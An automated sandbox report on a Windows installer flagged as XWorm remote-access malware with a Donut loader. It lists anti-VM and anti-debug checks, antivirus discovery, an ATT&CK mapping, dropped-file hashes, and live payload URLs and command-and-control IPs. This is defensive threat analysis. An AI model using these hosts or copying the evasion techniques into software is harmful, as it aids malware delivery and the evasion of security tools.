Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\103-o_Installer.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\103-o_Installer.exe	Memory allocated: 2FC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Memory allocated: 3140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Memory allocated: 5140000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\103-o_Installer.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\103-o_Installer.exe	Window / User API: threadDelayed 7422			Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Window / User API: threadDelayed 2418			Jump to behavior

Source: C:\Users\user\Desktop\103-o_Installer.exe TID: 5640	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe TID: 1000	Thread sleep count: 7422 > 30	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe TID: 1000	Thread sleep count: 2418 > 30	Jump to behavior

Source: C:\Users\user\Desktop\103-o_Installer.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Users\user\Desktop\103-o_Installer.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: 103-o_Installer.exe, 00000000.00000002.3670052787.00000000008FE000.00000004.00000020.00020000.00000000.sdmp, 103-o_Installer.exe, 00000000.00000002.3670052787.0000000000959000.00000004.00000020.00020000.00000000.sdmp, 103-o_Installer.exe, 00000000.00000003.1540396903.0000000000962000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 103-o_Installer.exe, 00000000.00000002.3670052787.0000000000959000.00000004.00000020.00020000.00000000.sdmp, 103-o_Installer.exe, 00000000.00000003.1540396903.0000000000962000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWcT

Source: C:\Users\user\Desktop\103-o_Installer.exe	API call chain: ExitProcess graph end node			graph_0-25353
Source: C:\Users\user\Desktop\103-o_Installer.exe	API call chain: ExitProcess graph end node			graph_0-25538

Source: C:\Users\user\Desktop\103-o_Installer.exe

Code function: 0_2_003A65D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_003A65D1

Source: C:\Users\user\Desktop\103-o_Installer.exe

0_2_003B40E4

Source: C:\Users\user\Desktop\103-o_Installer.exe

Code function: 0_2_02EE1628 mov eax, dword ptr fs:[00000030h]

0_2_02EE1628

Source: C:\Users\user\Desktop\103-o_Installer.exe

Code function: 0_2_003B7CB1 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

0_2_003B7CB1

Source: C:\Users\user\Desktop\103-o_Installer.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: 0_2_003A65D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_003A65D1
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: 0_2_003AA792 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_003AA792
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: 0_2_003AC78D SetUnhandledExceptionFilter,	0_2_003AC78D

Source: C:\Users\user\Desktop\103-o_Installer.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\103-o_Installer.exe

Code function: 0_2_003A1671 cpuid

0_2_003A1671

Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: GetLocaleInfoA,	0_2_003B4859
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_003AE04E
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	0_2_003AF895
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_003AF955
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_003AF9BC
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	0_2_003AF9F8
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	0_2_003ADC2B
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	0_2_003B44BA
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_003AECAA
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_003AF4CD
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_003B4594
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	0_2_003AF5C2
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	0_2_003AF669
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	0_2_003AF6C4
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_003AEF98
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	0_2_003A5FC5

Source: C:\Users\user\Desktop\103-o_Installer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\103-o_Installer.exe

Code function: 0_2_003A41BA GetSystemTimeAsFileTime,__aulldiv,

0_2_003A41BA

Source: C:\Users\user\Desktop\103-o_Installer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: 103-o_Installer.exe, 00000000.00000002.3670052787.000000000093C000.00000004.00000020.00020000.00000000.sdmp, 103-o_Installer.exe, 00000000.00000003.1540396903.000000000098A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\103-o_Installer.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 0.2.103-o_Installer.exe.5390000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3672250082.0000000005390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3671692196.0000000003141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 103-o_Installer.exe PID: 5508, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 0.2.103-o_Installer.exe.5390000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3672250082.0000000005390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3671692196.0000000003141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 103-o_Installer.exe PID: 5508, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	141 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	131 Virtualization/Sandbox Evasion	Security Account Manager	131 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	34 System Information Discovery	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
103-o_Installer.exe	26%	ReversingLabs	Win32.Trojan.Doina
103-o_Installer.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://guanlix.cn:881/103.ccp	0%	Avira URL Cloud	safe
http://guanlix.cn:881/103.ccph	0%	Avira URL Cloud	safe
59.56.110.103	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
guanlix.cn	91.208.240.157	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://guanlix.cn:881/103.ccp	false	Avira URL Cloud: safe	unknown
59.56.110.103	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://guanlix.cn:881/103.ccph	103-o_Installer.exe, 00000000.00000002.3670052787.000000000093C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	103-o_Installer.exe, 00000000.00000002.3671692196.0000000003141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
91.208.240.157	guanlix.cn	unknown		139659	LUCID-AS-APLUCIDACLOUDLIMITEDHK	false
59.56.110.103	unknown	China		133774	CHINATELECOM-FUJIAN-FUZHOU-IDC1FuzhouCN	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1466308
Start date and time:	2024-07-02 19:20:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	103-o_Installer.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@1/2@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 29 Number of non-executed functions: 34
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: 103-o_Installer.exe

Simulations

Behavior and APIs

Time	Type	Description
13:21:11	API Interceptor	9009599x Sleep call for process: 103-o_Installer.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CHINATELECOM-FUJIAN-FUZHOU-IDC1FuzhouCN	mirai.spc.elf	Get hash	malicious	Mirai	Browse	203.15.232.74
	DCwYFBy6z7.elf	Get hash	malicious	Mirai, Moobot	Browse	121.204.142.151
	WE4VRokml7.elf	Get hash	malicious	Mirai, Moobot	Browse	27.151.169.129
	#U6700#U65b0#U7cfb#U7edf#U4e0a#U7ebf#U5bf9#U63a5#U6750#U6599#U4fe1#U606f_1282137129312371283.exe	Get hash	malicious	CobaltStrike	Browse	121.207.229.248
	7e5.docx.doc	Get hash	malicious	Unknown	Browse	27.155.113.139
	16knGm6BfY.elf	Get hash	malicious	Mirai, Moobot	Browse	59.56.113.151
	skt.ppc.elf	Get hash	malicious	Mirai	Browse	27.157.108.170
	wO2hW34tnC.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	218.66.110.222
	sora.arm.elf	Get hash	malicious	Mirai	Browse	27.157.108.174
	#U5c97#U4f4d#U8865#U52a9#U5236#U5ea6.docx.doc	Get hash	malicious	Unknown	Browse	27.155.113.139
LUCID-AS-APLUCIDACLOUDLIMITEDHK	https://telegram-wv.icu/	Get hash	malicious	Unknown	Browse	103.143.81.212
	#U6ce1#U6ce1#U7801#U5ba2#U6237#U7aef.exe	Get hash	malicious	Unknown	Browse	45.136.13.176
	#U6ce1#U6ce1#U7801#U5ba2#U6237#U7aef.exe	Get hash	malicious	Unknown	Browse	45.136.13.176
	CXM5Rc4W2k.exe	Get hash	malicious	GhostRat	Browse	103.143.81.180
	CXM5Rc4W2k.exe	Get hash	malicious	GhostRat	Browse	103.143.81.180
	dllhostpgd.exe	Get hash	malicious	CobaltStrike	Browse	45.136.14.159
	dllhostpgd.exe	Get hash	malicious	CobaltStrike	Browse	45.136.14.159
	qrUvlKkf7N.elf	Get hash	malicious	Mirai	Browse	45.144.137.162
	qwb3x7yFdW.elf	Get hash	malicious	Mirai	Browse	45.144.137.183
	sora.arm.elf	Get hash	malicious	Mirai	Browse	45.144.137.155

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\Public\Downloads\ind.cod

Download File

Process:	C:\Users\user\Desktop\103-o_Installer.exe
File Type:	data
Category:	dropped
Size (bytes):	71938
Entropy (8bit):	7.604678512981776
Encrypted:	false
SSDEEP:	1536:+Sjk79gZOcfNdQdX5kDjfjx1rwa7F0vGmM6eKXBwLsy1ETqfvu+P4Rtsj5o:S5gblOdX50jxJZJmMRKXBwLs/
MD5:	30DD8CD1E4557604F2F904623AC15350
SHA1:	4605B3E8F3FDDA4E22389CC655842D67A5A02D65
SHA-256:	6B3852E6F2BD2DF3A4AD5AD33009227E682BBB25B5C0F7EDFA0124C05B08138B
SHA-512:	B96490A8F2116250C5AA99F5C76895829F21595E40674AC828EF138598EF3D8BE0D3CA5F3BE4D3E250C2FB6D18B8108868032BE61E68868062A731EE27A23459
Malicious:	false
Yara Hits:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\Public\Downloads\ind.cod, Author: unknown
Reputation:	low
Preview:	........]..._1.....R....i....F.cE[C....Yy......I.....`G.`9..A....<....xpQ&P&...5.#...H.rf...w...5-z.{\..ht..o>/..^...3.!...!M......sA...A.w.-+...P.u5....~k.I.w...%..A....P.1P8~..c.....4.S.6t..Fls..j&T.;vs.D.....b..D...0y.7).J.F.73...~.`..L.j.=.,E...Ktf....\|AN.............jTsH'....;...\6.A.e....$=............................................................................................................................................................................................................................................................($.=...V..3O...... .,.b...fB...C.=]\H.C{.}...Z..(Y'...+..2..j...wO....a&^..^.....{.........R.j..\|...."/}..."=j.V.....P...)C8....h.....`m..l.T.....K...#...v.Z.l:]....}....j.]....]..}Fu.S.O.S.u1.R ....@..Rq.......)6..HHX..}..........TO.kB$.M...Gq.....H...I(..1.SG`.!t<..[..A.zA........?.5.u....fcj6..<..;.;.Q.^.l3....5.Nh....;X.eA..~.......WJnE.. ...JU[ldI....b[.=0.....f>._....mc.....1...p..$4.....$}.....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\103[1].ccp

Download File

Process:	C:\Users\user\Desktop\103-o_Installer.exe
File Type:	data
Category:	dropped
Size (bytes):	71938
Entropy (8bit):	7.604678512981776
Encrypted:	false
SSDEEP:	1536:+Sjk79gZOcfNdQdX5kDjfjx1rwa7F0vGmM6eKXBwLsy1ETqfvu+P4Rtsj5o:S5gblOdX50jxJZJmMRKXBwLs/
MD5:	30DD8CD1E4557604F2F904623AC15350
SHA1:	4605B3E8F3FDDA4E22389CC655842D67A5A02D65
SHA-256:	6B3852E6F2BD2DF3A4AD5AD33009227E682BBB25B5C0F7EDFA0124C05B08138B
SHA-512:	B96490A8F2116250C5AA99F5C76895829F21595E40674AC828EF138598EF3D8BE0D3CA5F3BE4D3E250C2FB6D18B8108868032BE61E68868062A731EE27A23459
Malicious:	false
Yara Hits:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\103[1].ccp, Author: unknown
Reputation:	low
Preview:	........]..._1.....R....i....F.cE[C....Yy......I.....`G.`9..A....<....xpQ&P&...5.#...H.rf...w...5-z.{\..ht..o>/..^...3.!...!M......sA...A.w.-+...P.u5....~k.I.w...%..A....P.1P8~..c.....4.S.6t..Fls..j&T.;vs.D.....b..D...0y.7).J.F.73...~.`..L.j.=.,E...Ktf....\|AN.............jTsH'....;...\6.A.e....$=............................................................................................................................................................................................................................................................($.=...V..3O...... .,.b...fB...C.=]\H.C{.}...Z..(Y'...+..2..j...wO....a&^..^.....{.........R.j..\|...."/}..."=j.V.....P...)C8....h.....`m..l.T.....K...#...v.Z.l:]....}....j.]....]..}Fu.S.O.S.u1.R ....@..Rq.......)6..HHX..}..........TO.kB$.M...Gq.....H...I(..1.SG`.!t<..[..A.zA........?.5.u....fcj6..<..;.;.Q.^.l3....5.Nh....;X.eA..~.......WJnE.. ...JU[ldI....b[.=0.....f>._....mc.....1...p..$4.....$}.....

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.939939761503241
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	103-o_Installer.exe
File size:	249'344 bytes
MD5:	dc4b9be7a5645d5c7fd18a4ac175830c
SHA1:	3b2a0dc310a1af35629fca61ae1ccc530b8c9a30
SHA256:	233e15fe06e10eb85efdd62345a90c62d43d30f2d01122d79fbc5299c25f3d81
SHA512:	aca2108ae93ff5be7c9196d6b92101c8bd83d48302847f69ed785fce146098e7753e62c14efa9c4b50122130e46bb8aacb283ea4cd0f4ba8491a2aa7a0a518da
SSDEEP:	3072:3uWmO3uTwghfpRBCa5XrD5sxTQ1wb7QNaV4ZQeAnuTCt2xbzmyoaq6rcYsc8kOee:3uW4TwSR57aTQCQN4njZ2x0p
TLSH:	D4346B92F6C0C4B6D81711B5D83ADEB2126BBD798974010B36A4372F5EB72831937E0B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.q>...m...m...mj..m...mj..m...m...m...m...m_..mj..m1..mj..m...mj..m...mRich...m........PE..L...o..f.................v...T.....

File Icon


Icon Hash:	20246c0c56e20926

Static PE Info

General

Entrypoint:	0x405b41
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6682066F [Mon Jul 1 01:29:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	0b47c746b58dc722dcec07246158fda2

Entrypoint Preview

Instruction
call 00007FAB40D675B5h
jmp 00007FAB40D6001Eh
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
test eax, eax
je 00007FAB40D601A4h
sub eax, 08h
cmp dword ptr [eax], 0000DDDDh
jne 00007FAB40D60199h
push eax
call 00007FAB40D5EA7Fh
pop ecx
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov esi, ecx
mov byte ptr [esi+0Ch], 00000000h
test eax, eax
jne 00007FAB40D601F5h
call 00007FAB40D63DAEh
mov dword ptr [esi+08h], eax
mov ecx, dword ptr [eax+6Ch]
mov dword ptr [esi], ecx
mov ecx, dword ptr [eax+68h]
mov dword ptr [esi+04h], ecx
mov ecx, dword ptr [esi]
cmp ecx, dword ptr [004201F8h]
je 00007FAB40D601A4h
mov ecx, dword ptr [0041FFB0h]
test dword ptr [eax+70h], ecx
jne 00007FAB40D60199h
call 00007FAB40D67F8Fh
mov dword ptr [esi], eax
mov eax, dword ptr [esi+04h]
cmp eax, dword ptr [0041FEB8h]
je 00007FAB40D601A8h
mov eax, dword ptr [esi+08h]
mov ecx, dword ptr [0041FFB0h]
test dword ptr [eax+70h], ecx
jne 00007FAB40D6019Ah
call 00007FAB40D677EEh
mov dword ptr [esi+04h], eax
mov eax, dword ptr [esi+08h]
test byte ptr [eax+70h], 00000002h
jne 00007FAB40D601A6h
or dword ptr [eax+70h], 02h
mov byte ptr [esi+0Ch], 00000001h
jmp 00007FAB40D6019Ch
mov ecx, dword ptr [eax]
mov dword ptr [esi], ecx
mov eax, dword ptr [eax+04h]
mov dword ptr [esi+04h], eax
mov eax, esi
pop esi
pop ebp
retn 0004h
mov edi, edi
push ebp
mov ebp, esp
sub esp, 10h
mov eax, dword ptr [0041F920h]
xor eax, ebp
mov dword ptr [ebp-04h], eax
mov edx, dword ptr [ebp+18h]
push ebx

Rich Headers

Programming Language:

[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[C++] VS2010 build 30319
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1d96c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x23000	0x1c6ec	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x40000	0x138c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1c378	0x40	.rdata
